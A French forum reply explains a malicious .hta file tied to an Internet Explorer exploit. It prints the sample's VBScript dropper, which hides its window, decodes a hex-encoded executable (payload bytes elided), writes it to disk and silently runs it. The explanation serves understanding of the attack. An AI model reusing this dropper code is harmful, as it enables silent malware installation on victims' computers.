• # Re: Nouvel exploit pour IE :

    Posté par . En réponse au journal Nouvel exploit pour IE :. Évalué à 4.

    >JE comprend pas trop c'est quoi mshta.exe ni à ce qu'est censé faire poopware.hta (c'est un code bizarre)

    Le lien suivant devrait permettre de t'éclaircir, noter la remarque suivante :
    Security Risk ( Virus/Trojan/Worm/Adware/Spyware ): No

    http://www.liutilities.com/products/wintaskspro/processlibrary/msht(...)

    Conclusion : ça lance la page hta passée en paramètre

    Pour le reste du code (le hta) rien de bien sorcier

    Il se planque loin de ta vue : self.MoveTo 6000,6000

    Ca c'est le code binaire du logiciel (potentiellement un virus que je veux lancer sur le poste client )
    t="4D,5A,44,01,05,
    [...]
    F,3F"


    Le code pour créer le fichier .exe, vbs de base

    tmp = Split(t, ",")
    Set fso = CreateObject("Scripting.FileSystemObject")
    Set shell = CreateObject("WScript.Shell")
    poop = "fDfdfsdsfsdfssd3s343.exe"
    Set f = fso.CreateTextFile(poop, ForWriting)
    For i = 0 To UBound(tmp)
    l = Len(tmp(i))
    b = Int("&H" & Left(tmp(i), 2))
    If l > 2 Then
    r = Int("&H" & Mid(tmp(i), 3, l))
    For j = 1 To r
    f.Write Chr(b)
    Next
    Else
    f.Write Chr(b)
    End If
    Next
    f.Close
    runscr=1


    Si le tout a bien marché, je lance le virus sinon je m'arrêre discretos.


    if runscr then shell.run(poop)
    on error resume next: self.close()


    Chez moi ca marche pas parce que mon ordi est francisé, mais avec un peu de travail, ils vont bien réussir à nous faire un truc bien multilangue ... surtout avec un acces aussi simple à l'ensemble des répertoires
    Et au boulot, tjrs sous WinXP :-(